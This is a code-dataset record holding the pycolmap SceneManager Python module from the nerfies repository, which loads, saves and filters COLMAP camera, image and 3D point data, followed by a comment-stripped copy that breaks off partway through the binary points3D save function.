from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
| true
| true
|
f70b81350664ee0818d7513eb9f617928ed6b5e5
| 26,952
|
py
|
Python
|
third_party/pycolmap/pycolmap/scene_manager.py
|
dukebw/nerfies
|
b30fe19edb6435e770b35dc07aab44ae62c96278
|
[
"Apache-2.0"
] | null | null | null |
third_party/pycolmap/pycolmap/scene_manager.py
|
dukebw/nerfies
|
b30fe19edb6435e770b35dc07aab44ae62c96278
|
[
"Apache-2.0"
] | null | null | null |
third_party/pycolmap/pycolmap/scene_manager.py
|
dukebw/nerfies
|
b30fe19edb6435e770b35dc07aab44ae62c96278
|
[
"Apache-2.0"
] | null | null | null |
# Author: True Price <jtprice at cs.unc.edu>
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
# -------------------------------------------------------------------------------
#
# SceneManager
#
# -------------------------------------------------------------------------------
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
# Nx3 array of point3D xyz's
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
except:
pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
fid.write(image.name + "\0")
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
for image_id, image in self.images.items():
print(image_id, file=fid)
print(" ".join(str(qi) for qi in image.q.q), file=fid)
print(" ".join(str(ti) for ti in image.tvec), file=fid)
print(image.camera_id, image.name, file=fid)
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
if len(data) > 0:
np.savetxt(fid, data, "%.2f %.2f %d", newline=" ")
fid.seek(-1, os.SEEK_CUR)
fid.write("\n")
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
print(point3D_id, file=fid)
print(array_to_string(self.points3D[point3D_idx]), file=fid)
print(array_to_string(self.point3D_colors[point3D_idx]), file=fid)
print(self.point3D_errors[point3D_idx], file=fid)
print(
array_to_string(self.point3D_id_to_images[point3D_id].flat),
file=fid,
)
# ---------------------------------------------------------------------------
# return the image id associated with a given image file
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
keep_set = set(self.images.iterkeys())
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# camera_list: set of cameras whose points we'd like to keep
# min/max triangulation angle: in degrees
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
# check if error and min track length are sufficient, or if none of
# the selected cameras see the point
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# find dot product between all camera viewing rays
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
# min_prod = cos(maximum viewing angle), and vice versa
# if maximum viewing angle is too small or too large,
# don't add this point
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# scene graph: {image_id: [image_id: #shared points]}
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
| 38.947977
| 88
| 0.532762
|
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
except:
pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
fid.write(image.name + "\0")
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
for image_id, image in self.images.items():
print(image_id, file=fid)
print(" ".join(str(qi) for qi in image.q.q), file=fid)
print(" ".join(str(ti) for ti in image.tvec), file=fid)
print(image.camera_id, image.name, file=fid)
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
if len(data) > 0:
np.savetxt(fid, data, "%.2f %.2f %d", newline=" ")
fid.seek(-1, os.SEEK_CUR)
fid.write("\n")
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
